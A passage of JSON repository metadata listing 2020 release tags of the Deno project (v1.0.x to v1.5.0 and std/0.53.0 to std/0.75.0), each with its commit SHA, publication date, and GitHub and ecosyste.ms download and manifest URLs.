"html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/host